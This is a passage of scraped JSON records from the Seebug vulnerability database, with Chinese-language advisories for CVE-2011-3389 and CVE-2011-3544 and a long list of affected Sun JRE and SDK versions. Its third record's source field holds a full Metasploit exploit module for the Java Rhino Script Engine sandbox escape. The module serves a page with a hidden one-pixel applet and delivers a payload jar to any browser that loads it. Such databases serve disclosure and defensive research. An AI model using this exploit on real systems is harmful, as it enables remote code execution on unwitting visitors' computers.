"IBM Rational AppScan 8.x/7.x \u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3389", "CVE-2011-3516", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3545", "CVE-2011-3546", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3550", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3560", "CVE-2011-3561", "CVE-2011-3563", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0498", "CVE-2012-0499", "CVE-2012-0500", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507", "CVE-2012-0732", "CVE-2012-2159", "CVE-2012-2161"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2012-06-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60220", "id": "SSV:60220", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:59:04", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID: CVE-2011-3389\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nMicrosoft Windows\u5728SSL/TLS\u534f\u8bae\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u5e76\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\r\n\r\n\u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728CBC\u6a21\u5f0f\u4e2d\u7ed3\u5408\u5bf9\u79f0\u5bc6\u7801\u5957\u4ef6\u4f7f\u7528Secure Sockets Layer 3.0 (SSL)\u548cTransport Layer Security 1.0 (TLS) \u534f\u8bae\u65f6\u51fa\u73b0\u7684\u8bbe\u8ba1\u9519\u8bef\uff0c\u901a\u8fc7\u4e2d\u95f4\u4eba\u653b\u51fb\u52a0\u5bc6HTTPS\u4f1a\u8bdd\u3002\n\nMicrosoft Windows\r\nMicrosoft Windows XP Home\r\nMicrosoft Windows XP Professional\r\nMicrosoft Windows Server 2003\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff082588513\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\n2588513\uff1aMicrosoft releases Security Advisory 2588513\r\n\r\n\u94fe\u63a5\uff1ahttp://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", "reporter": "Root", "published": "2011-09-29T00:00:00", "title": "Microsoft Windows SSL/TLS\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3389"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2011-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20957", "id": "SSV:20957", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T16:12:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Java Applet Rhino Script Engine Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72368", "id": "SSV:72368", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize( info = {} )\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Rhino Script Engine that\r\n\t\t\t\tcan be used by a Java Applet to run arbitrary Java code outside of\r\n\t\t\t\tthe sandbox. The vulnerability affects version 7 and version 6 update\r\n\t\t\t\t27 and earlier, and should work on any browser that supports Java\r\n\t\t\t\t(for example: IE, Firefox, Google Chrome, etc)\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Michael Schierl', # Discovery\r\n\t\t\t\t\t'juan vazquez', # metasploit module\r\n\t\t\t\t\t'Edward D. Teach <teach@consortium-of-pwners.net>',\r\n\t\t\t\t\t'sinn3r'\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-3544' ],\r\n\t\t\t\t\t[ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ],\r\n\t\t\t\t\t[ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Apple OSX',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ARCH' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Oct 18 2011'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri( cli, request )\r\n\t\tif not request.uri.match(/\\.jar$/i)\r\n\t\t\tif not request.uri.match(/\\/$/)\r\n\t\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\tprint_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\t\tsend_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tpaths = [\r\n\t\t\t[ "Exploit.class" ]\r\n\t\t]\r\n\r\n\t\tp = regenerate_payload(cli)\r\n\r\n\t\tjar = p.encoded_jar\r\n\t\tpaths.each do |path|\r\n\t\t\t1.upto(path.length - 1) do |idx|\r\n\t\t\t\tfull = path[0,idx].join("/") + "/"\r\n\t\t\t\tif !(jar.entries.map{|e|e.name}.include?(full))\r\n\t\t\t\t\tjar.add_file(full, '')\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\tfd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb")\r\n\t\t\tdata = fd.read(fd.stat.size)\r\n\t\t\tjar.add_file(path.join("/"), data)\r\n\t\t\tfd.close\r\n\t\tend\r\n\r\n\t\tprint_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )\r\n\t\tsend_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )\r\n\r\n\t\thandler( cli )\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = "<html><head><title>Loading, Please Wait...</title></head>"\r\n\t\thtml += "<body><center>Loading, Please Wait...</center>"\r\n\t\thtml += "<applet archive=\\"Exploit.jar\\" code=\\"Exploit.class\\" width=\\"1\\" height=\\"1\\">"\r\n\t\thtml += "</applet></body></html>"\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72368", "status": "cve,poc"}, {"lastseen": "2017-11-19T17:56:49", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "Bugtraq ID: 50218\r\nCVE ID\uff1aCVE-2011-3544\r\n\r\nSun Java Runtime Environment\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\u3002\r\nJava\u5904\u7406Rhino JavaScript\u9519\u8bef\u5b58\u5728\u7f3a\u9677\uff0cJava\u4e2d\u7684\u5185\u7f6ejavascript\u5f15\u64ce\u6ca1\u6709\u5bf9javascript\u9519\u8bef\u5bf9\u8c61\u6267\u884c\u5145\u5206\u8fc7\u6ee4\uff0c\u7ed3\u679c\u5bfc\u81f4\u4e0d\u53ef\u4fe1\u4ee3\u7801\u4ee5\u7279\u6743\u4e0a\u4e0b\u6587\u8fd0\u884c\n\nSun SDK (Windows Production Release) 1.4.2 _24\r\n Sun SDK (Windows Production Release) 1.4.2 _15\r\n Sun SDK (Windows Production Release) 1.4.2 _10\r\n Sun SDK (Windows Production Release) 1.4.2 _09\r\n Sun SDK (Windows Production Release) 1.4.2 _08\r\n Sun SDK (Windows Production Release) 1.4.2 _07\r\n Sun SDK (Windows Production Release) 1.4.2 _06\r\n Sun SDK (Windows Production Release) 1.4.2 _05\r\n Sun SDK (Windows Production Release) 1.4.2 _04\r\n Sun SDK (Windows Production Release) 1.4.2 _03\r\n Sun SDK (Windows Production Release) 1.4.2\r\n Sun SDK (Windows Production Release) 1.4.2_33\r\n Sun SDK (Windows Production Release) 1.4.2_32\r\n Sun SDK (Windows Production Release) 1.4.2_31\r\n Sun SDK (Windows Production Release) 1.4.2_30\r\n Sun SDK (Windows Production Release) 1.4.2_29\r\n Sun SDK (Windows Production Release) 1.4.2_28\r\n Sun SDK (Windows Production Release) 1.4.2_27\r\n Sun SDK (Windows Production Release) 1.4.2_26\r\n Sun SDK (Windows Production Release) 1.4.2_25\r\n Sun SDK (Windows Production Release) 1.4.2_22\r\n Sun SDK (Windows Production Release) 1.4.2_20\r\n Sun SDK (Windows Production Release) 1.4.2_19\r\n Sun SDK (Windows Production Release) 1.4.2_18\r\n Sun SDK (Windows Production Release) 1.4.2_17\r\n Sun SDK (Windows Production Release) 1.4.2_16\r\n Sun SDK (Windows Production Release) 1.4.2_14\r\n Sun SDK (Windows Production Release) 1.4.2_13\r\n Sun SDK (Windows Production Release) 1.4.2_12\r\n Sun SDK (Windows Production Release) 1.4.2_11\r\n Sun SDK (Solaris Production Release) 1.4.2 _24\r\n Sun SDK (Solaris Production Release) 1.4.2 _15\r\n Sun SDK (Solaris Production Release) 1.4.2 _10\r\n Sun SDK (Solaris Production Release) 1.4.2 _09\r\n Sun SDK (Solaris Production Release) 1.4.2 _08\r\n Sun SDK (Solaris Production Release) 1.4.2 _07\r\n Sun SDK (Solaris Production Release) 1.4.2 _06\r\n Sun SDK (Solaris Production Release) 1.4.2 _05\r\n Sun SDK (Solaris Production Release) 1.4.2 _04\r\n Sun SDK (Solaris Production Release) 1.4.2 _03\r\n Sun SDK (Solaris Production Release) 1.4.2\r\n Sun SDK (Solaris Production Release) 1.4.2_33\r\n Sun SDK (Solaris Production Release) 1.4.2_32\r\n Sun SDK (Solaris Production Release) 1.4.2_31\r\n Sun SDK (Solaris Production Release) 1.4.2_30\r\n Sun SDK (Solaris Production Release) 1.4.2_29\r\n Sun SDK (Solaris Production Release) 1.4.2_28\r\n Sun SDK (Solaris Production Release) 1.4.2_27\r\n Sun SDK (Solaris Production Release) 1.4.2_26\r\n Sun SDK (Solaris Production Release) 1.4.2_25\r\n Sun SDK (Solaris Production Release) 1.4.2_22\r\n Sun SDK (Solaris Production Release) 1.4.2_20\r\n Sun SDK (Solaris Production Release) 1.4.2_19\r\n Sun SDK (Solaris Production Release) 1.4.2_18\r\n Sun SDK (Solaris Production Release) 1.4.2_17\r\n Sun SDK (Solaris Production Release) 1.4.2_16\r\n Sun SDK (Solaris Production Release) 1.4.2_14\r\n Sun SDK (Solaris Production Release) 1.4.2_13\r\n Sun SDK (Solaris Production Release) 1.4.2_12\r\n Sun SDK (Solaris Production Release) 1.4.2_11\r\n Sun SDK (Linux Production Release) 1.4.2 _24\r\n Sun SDK (Linux Production Release) 1.4.2 _15\r\n Sun SDK (Linux Production Release) 1.4.2 _10\r\n Sun SDK (Linux Production Release) 1.4.2 _09\r\n Sun SDK (Linux Production Release) 1.4.2 _08\r\n Sun SDK (Linux Production Release) 1.4.2 _07\r\n Sun SDK (Linux Production Release) 1.4.2 _06\r\n Sun SDK (Linux Production Release) 1.4.2 _05\r\n Sun SDK (Linux Production Release) 1.4.2 _04\r\n Sun SDK (Linux Production Release) 1.4.2 _03\r\n Sun SDK (Linux Production Release) 1.4.2 _02\r\n Sun SDK (Linux Production Release) 1.4.2 _01\r\n Sun SDK (Linux Production Release) 1.4.2\r\n Sun SDK (Linux Production Release) 1.4.2_33\r\n Sun SDK (Linux Production Release) 1.4.2_32\r\n Sun SDK (Linux Production Release) 1.4.2_31\r\n Sun SDK (Linux Production Release) 1.4.2_30\r\n Sun SDK (Linux Production Release) 1.4.2_29\r\n Sun SDK (Linux Production Release) 1.4.2_28\r\n Sun SDK (Linux Production Release) 1.4.2_27\r\n Sun SDK (Linux Production Release) 1.4.2_26\r\n Sun SDK (Linux Production Release) 1.4.2_25\r\n Sun SDK (Linux Production Release) 1.4.2_22\r\n Sun SDK (Linux Production Release) 1.4.2_20\r\n Sun SDK (Linux Production Release) 1.4.2_19\r\n Sun SDK (Linux Production Release) 1.4.2_18\r\n Sun SDK (Linux Production Release) 1.4.2_17\r\n Sun SDK (Linux Production Release) 1.4.2_16\r\n Sun SDK (Linux Production Release) 1.4.2_14\r\n Sun SDK (Linux Production Release) 1.4.2_13\r\n Sun SDK (Linux Production Release) 1.4.2_12\r\n Sun SDK (Linux Production Release) 1.4.2_11\r\n Sun JRE (Windows Production Release) 1.6 _17\r\n Sun JRE (Windows Production Release) 1.6 _13\r\n Sun JRE (Windows Production Release) 1.6 _12\r\n Sun JRE (Windows Production Release) 1.6 _10\r\n Sun JRE (Windows Production Release) 1.6 _07\r\n Sun JRE (Windows Production Release) 1.6 _06\r\n Sun JRE (Windows Production Release) 1.6 _05\r\n Sun JRE (Windows Production Release) 1.6 _04\r\n Sun JRE (Windows Production Release) 1.6\r\n Sun JRE (Windows Production Release) 1.5 _22\r\n Sun JRE (Windows Production Release) 1.5 _18\r\n Sun JRE (Windows Production Release) 1.5 _16\r\n Sun JRE (Windows Production Release) 1.5 _15\r\n Sun JRE (Windows Production Release) 1.5 _06\r\n Sun JRE (Windows Production Release) 1.5 _05\r\n Sun JRE (Windows Production Release) 1.5 _04\r\n Sun JRE (Windows Production Release) 1.5 _03\r\n Sun JRE (Windows Production Release) 1.5 _02\r\n Sun JRE (Windows Production Release) 1.5 _01\r\n Sun JRE (Windows Production Release) 1.5\r\n Sun JRE (Windows Production Release) 1.4.2 _28\r\n Sun JRE (Windows Production Release) 1.4.2 _27\r\n Sun JRE (Windows Production Release) 1.4.2 _24\r\n Sun JRE (Windows Production Release) 1.4.2 _10\r\n Sun JRE (Windows Production Release) 1.4.2 _09\r\n Sun JRE (Windows Production Release) 1.4.2 _09\r\n Sun JRE (Windows Production Release) 1.4.2 _08\r\n Sun JRE (Windows Production Release) 1.4.2 _08\r\n Sun JRE (Windows Production Release) 1.4.2 _07\r\n Sun JRE (Windows Production Release) 1.4.2 _07\r\n Sun JRE (Windows Production Release) 1.4.2 _06\r\n Sun JRE (Windows Production Release) 1.4.2 _05\r\n Sun JRE (Windows Production Release) 1.4.2 _04\r\n Sun JRE (Windows Production Release) 1.4.2 _03\r\n Sun JRE (Windows Production Release) 1.4.2 _02\r\n Sun JRE (Windows Production Release) 1.4.2 _01\r\n Sun JRE (Windows Production Release) 1.4.2\r\n Sun JRE (Windows Production Release) 1.6.0_27\r\n Sun JRE (Windows Production Release) 1.6.0_26\r\n Sun JRE (Windows Production Release) 1.6.0_25\r\n Sun JRE (Windows Production Release) 1.6.0_24\r\n Sun JRE (Windows Production Release) 1.6.0_23\r\n Sun JRE (Windows Production Release) 1.6.0_22\r\n Sun JRE (Windows Production Release) 1.6.0_21\r\n Sun JRE (Windows Production Release) 1.6.0_20\r\n Sun JRE (Windows Production Release) 1.6.0_2\r\n Sun JRE (Windows Production Release) 1.6.0_19\r\n Sun JRE (Windows Production Release) 1.6.0_18\r\n Sun JRE (Windows Production Release) 1.6.0_15\r\n Sun JRE (Windows Production Release) 1.6.0_14\r\n Sun JRE (Windows Production Release) 1.6.0_11\r\n Sun JRE (Windows Production Release) 1.6.0_03\r\n Sun JRE (Windows Production Release) 1.6.0_02\r\n Sun JRE (Windows Production Release) 1.6.0_01\r\n Sun JRE (Windows Production Release) 1.5.0_31\r\n Sun JRE (Windows Production Release) 1.5.0_30\r\n Sun JRE (Windows Production Release) 1.5.0_29\r\n Sun JRE (Windows Production Release) 1.5.0_28\r\n Sun JRE (Windows Production Release) 1.5.0_27\r\n Sun JRE (Windows Production Release) 1.5.0_26\r\n Sun JRE (Windows Production Release) 1.5.0_25\r\n Sun JRE (Windows Production Release) 1.5.0_23\r\n Sun JRE (Windows Production Release) 1.5.0_20\r\n Sun JRE (Windows Production Release) 1.5.0_17\r\n Sun JRE (Windows Production Release) 1.5.0_14\r\n Sun JRE (Windows Production Release) 1.5.0_13\r\n Sun JRE (Windows Production Release) 1.5.0_12\r\n Sun JRE (Windows Production Release) 1.5.0_11\r\n Sun JRE (Windows Production Release) 1.5.0_10\r\n Sun JRE (Windows Production Release) 1.5.0.0_09\r\n Sun JRE (Windows Production Release) 1.5.0.0_08\r\n Sun JRE (Windows Production Release) 1.5.0.0_07\r\n Sun JRE (Windows Production Release) 1.4.2_33\r\n Sun JRE (Windows Production Release) 1.4.2_32\r\n Sun JRE (Windows Production Release) 1.4.2_31\r\n Sun JRE (Windows Production Release) 1.4.2_30\r\n Sun JRE (Windows Production Release) 1.4.2_29\r\n Sun JRE (Windows Production Release) 1.4.2_25\r\n Sun JRE (Windows Production Release) 1.4.2_22\r\n Sun JRE (Windows Production Release) 1.4.2_20\r\n Sun JRE (Windows Production Release) 1.4.2_19\r\n Sun JRE (Windows Production Release) 1.4.2_18\r\n Sun JRE (Windows Production Release) 1.4.2_17\r\n Sun JRE (Windows Production Release) 1.4.2_16\r\n Sun JRE (Windows Production Release) 1.4.2_15\r\n Sun JRE (Windows Production Release) 1.4.2_14\r\n Sun JRE (Windows Production Release) 1.4.2_13\r\n Sun JRE (Windows Production Release) 1.4.2_12\r\n Sun JRE (Windows Production Release) 1.4.2_11\r\n Sun JRE (Solaris Production Release) 1.6 _17\r\n Sun JRE (Solaris Production Release) 1.6 _13\r\n Sun JRE (Solaris Production Release) 1.6 _12\r\n Sun JRE (Solaris Production Release) 1.6 _10\r\n Sun JRE (Solaris Production Release) 1.6 _07\r\n Sun JRE (Solaris Production Release) 1.6 _06\r\n Sun JRE (Solaris Production Release) 1.6 _05\r\n Sun JRE (Solaris Production Release) 1.6 _04\r\n Sun JRE (Solaris Production Release) 1.6\r\n Sun JRE (Solaris Production Release) 1.5 _22\r\n Sun JRE (Solaris Production Release) 1.5 _18\r\n Sun JRE (Solaris Production Release) 1.5 _16\r\n Sun JRE (Solaris Production Release) 1.5 _15\r\n Sun JRE (Solaris Production Release) 1.5 _06\r\n Sun JRE (Solaris Production Release) 1.5 _05\r\n Sun JRE (Solaris Production Release) 1.5 _04\r\n Sun JRE (Solaris Production Release) 1.5 _03\r\n Sun JRE (Solaris Production Release) 1.5 _02\r\n Sun JRE (Solaris Production Release) 1.5 _01\r\n Sun JRE (Solaris Production Release) 1.5\r\n Sun JRE (Solaris Production Release) 1.4.2 _24\r\n Sun JRE (Solaris Production Release) 1.4.2 _10\r\n Sun JRE (Solaris Production Release) 1.4.2 _09\r\n Sun JRE (Solaris Production Release) 1.4.2 _09\r\n Sun JRE (Solaris Production Release) 1.4.2 _08\r\n Sun JRE (Solaris Production Release) 1.4.2 _08\r\n Sun JRE (Solaris Production Release) 1.4.2 _07\r\n Sun JRE (Solaris Production Release) 1.4.2 _07\r\n Sun JRE (Solaris Production Release) 1.4.2 _06\r\n Sun JRE (Solaris Production Release) 1.4.2 _05\r\n Sun JRE (Solaris Production Release) 1.4.2 _04\r\n Sun JRE (Solaris Production Release) 1.4.2 _03\r\n Sun JRE (Solaris Production Release) 1.4.2 _02\r\n Sun JRE (Solaris Production Release) 1.4.2 _01\r\n Sun JRE (Solaris Production Release) 1.4.2\r\n Sun JRE (Solaris Production Release) 1.6.0_27\r\n Sun JRE (Solaris Production Release) 1.6.0_26\r\n Sun JRE (Solaris Production Release) 1.6.0_25\r\n Sun JRE (Solaris Production Release) 1.6.0_24\r\n Sun JRE (Solaris Production Release) 1.6.0_23\r\n Sun JRE (Solaris Production Release) 1.6.0_22\r\n Sun JRE (Solaris Production Release) 1.6.0_21\r\n Sun JRE (Solaris Production Release) 1.6.0_2\r\n Sun JRE (Solaris Production Release) 1.6.0_19\r\n Sun JRE (Solaris Production Release) 1.6.0_18\r\n Sun JRE (Solaris Production Release) 1.6.0_15\r\n Sun JRE (Solaris Production Release) 1.6.0_14\r\n Sun JRE (Solaris Production Release) 1.6.0_11\r\n Sun JRE (Solaris Production Release) 1.6.0_03\r\n Sun JRE (Solaris Production Release) 1.6.0_02\r\n Sun JRE (Solaris Production Release) 1.6.0_01\r\n Sun JRE (Solaris Production Release) 1.5.0_31\r\n Sun JRE (Solaris Production Release) 1.5.0_30\r\n Sun JRE (Solaris Production Release) 1.5.0_29\r\n Sun JRE (Solaris Production Release) 1.5.0_28\r\n Sun JRE (Solaris Production Release) 1.5.0_27\r\n Sun JRE (Solaris Production Release) 1.5.0_26\r\n Sun JRE (Solaris Production Release) 1.5.0_25\r\n Sun JRE (Solaris Production Release) 1.5.0_23\r\n Sun JRE (Solaris Production Release) 1.5.0_20\r\n Sun JRE (Solaris Production Release) 1.5.0_17\r\n Sun JRE (Solaris Production Release) 1.5.0_14\r\n Sun JRE (Solaris Production Release) 1.5.0_13\r\n Sun JRE (Solaris Production Release) 1.5.0_12\r\n Sun JRE (Solaris Production Release) 1.5.0_11\r\n Sun JRE (Solaris Production Release) 1.5.0_10\r\n Sun JRE (Solaris Production Release) 1.5.0.0_09\r\n Sun JRE (Solaris Production Release) 1.5.0.0_08\r\n Sun JRE (Solaris Production Release) 1.5.0.0_07\r\n Sun JRE (Solaris Production Release) 1.4.2_33\r\n Sun JRE (Solaris Production Release) 1.4.2_32\r\n Sun JRE (Solaris Production Release) 1.4.2_31\r\n Sun JRE (Solaris Production Release) 1.4.2_30\r\n Sun JRE (Solaris Production Release) 1.4.2_29\r\n Sun JRE (Solaris Production Release) 1.4.2_28\r\n Sun JRE (Solaris Production Release) 1.4.2_27\r\n Sun JRE (Solaris Production Release) 1.4.2_25\r\n Sun JRE (Solaris Production Release) 1.4.2_22\r\n Sun JRE (Solaris Production Release) 1.4.2_20\r\n Sun JRE (Solaris Production Release) 1.4.2_19\r\n Sun JRE (Solaris Production Release) 1.4.2_18\r\n Sun JRE (Solaris Production Release) 1.4.2_17\r\n Sun JRE (Solaris Production Release) 1.4.2_16\r\n Sun JRE (Solaris Production Release) 1.4.2_15\r\n Sun JRE (Solaris Production Release) 1.4.2_14\r\n Sun JRE (Solaris Production Release) 1.4.2_13\r\n Sun JRE (Solaris Production Release) 1.4.2_12\r\n Sun JRE (Solaris Production Release) 1.4.2_11\r\n Sun JRE (Linux Production Release) 1.6 _17\r\n Sun JRE (Linux Production Release) 1.6 _13\r\n Sun JRE (Linux Production Release) 1.6 _12\r\n Sun JRE (Linux Production Release) 1.6 _10\r\n Sun JRE (Linux Production Release) 1.6 _07\r\n Sun JRE (Linux Production Release) 1.6 _06\r\n Sun JRE (Linux Production Release) 1.6 _05\r\n Sun JRE (Linux Production Release) 1.6 _04\r\n Sun JRE (Linux Production Release) 1.6\r\n Sun JRE (Linux Production Release) 1.5 _22\r\n Sun JRE (Linux Production Release) 1.5 _18\r\n Sun JRE (Linux Production Release) 1.5 _16\r\n Sun JRE (Linux Production Release) 1.5 _15\r\n Sun JRE (Linux Production Release) 1.5 _07\r\n Sun JRE (Linux Production Release) 1.5 _06\r\n Sun JRE (Linux Production Release) 1.5 _05\r\n Sun JRE (Linux Production Release) 1.5 _04\r\n Sun JRE (Linux Production Release) 1.5 _03\r\n Sun JRE (Linux Production Release) 1.5 _02\r\n Sun JRE (Linux Production Release) 1.5 _01\r\n Sun JRE (Linux Production Release) 1.5 .0 beta\r\n Sun JRE (Linux Production Release) 1.5\r\n Sun JRE (Linux Production Release) 1.4.2 _24\r\n Sun JRE (Linux Production Release) 1.4.2 _10-b03\r\n Sun JRE (Linux Production Release) 1.4.2 _10\r\n Sun JRE (Linux Production Release) 1.4.2 _09\r\n Sun JRE (Linux Production Release) 1.4.2 _08\r\n Sun JRE (Linux Production Release) 1.4.2 _07\r\n Sun JRE (Linux Production Release) 1.4.2 _06\r\n Sun JRE (Linux Production Release) 1.4.2 _05\r\n Sun JRE (Linux Production Release) 1.4.2 _04\r\n Sun JRE (Linux Production Release) 1.4.2 _03\r\n Sun JRE (Linux Production Release) 1.4.2 _02\r\n Sun JRE (Linux Production Release) 1.4.2 _01\r\n Sun JRE (Linux Production Release) 1.4.2\r\n Sun JRE (Linux Production Release) 1.6.0_27\r\n Sun JRE (Linux Production Release) 1.6.0_26\r\n Sun JRE (Linux Production Release) 1.6.0_25\r\n Sun JRE (Linux Production Release) 1.6.0_24\r\n Sun JRE (Linux Production Release) 1.6.0_23\r\n Sun JRE (Linux Production Release) 1.6.0_22\r\n Sun JRE (Linux Production Release) 1.6.0_21\r\n Sun JRE (Linux Production Release) 1.6.0_20\r\n Sun JRE (Linux Production Release) 1.6.0_19\r\n Sun JRE (Linux Production Release) 1.6.0_18\r\n Sun JRE (Linux Production Release) 1.6.0_15\r\n Sun JRE (Linux Production Release) 1.6.0_14\r\n Sun JRE (Linux Production Release) 1.6.0_11\r\n Sun JRE (Linux Production Release) 1.6.0_03\r\n Sun JRE (Linux Production Release) 1.6.0_02\r\n Sun JRE (Linux Production Release) 1.6.0_01\r\n Sun JRE (Linux Production Release) 1.5.0_31\r\n Sun JRE (Linux Production Release) 1.5.0_30\r\n Sun JRE (Linux Production Release) 1.5.0_29\r\n Sun JRE (Linux Production Release) 1.5.0_28\r\n Sun JRE (Linux Production Release) 1.5.0_27\r\n Sun JRE (Linux Production Release) 1.5.0_26\r\n Sun JRE (Linux Production Release) 1.5.0_25\r\n Sun JRE (Linux Production Release) 1.5.0_23\r\n Sun JRE (Linux Production Release) 1.5.0_20\r\n Sun JRE (Linux Production Release) 1.5.0_17\r\n Sun JRE (Linux Production Release) 1.5.0_14\r\n Sun JRE (Linux Production Release) 1.5.0_13\r\n Sun JRE (Linux Production Release) 1.5.0_12\r\n Sun JRE (Linux Production Release) 1.5.0_11\r\n Sun JRE (Linux Production Release) 1.5.0_10\r\n Sun JRE (Linux Production Release) 1.5.0_09\r\n Sun JRE (Linux Production Release) 1.5.0_08\r\n Sun JRE (Linux Production Release) 1.4.2_33\r\n Sun JRE (Linux Production Release) 1.4.2_32\r\n Sun JRE (Linux Production Release) 1.4.2_31\r\n Sun JRE (Linux Production Release) 1.4.2_30\r\n Sun JRE (Linux Production Release) 1.4.2_29\r\n Sun JRE (Linux Production Release) 1.4.2_28\r\n Sun JRE (Linux Production Release) 1.4.2_27\r\n Sun JRE (Linux Production Release) 1.4.2_25\r\n Sun JRE (Linux Production Release) 1.4.2_22\r\n Sun JRE (Linux Production Release) 1.4.2_20\r\n Sun JRE 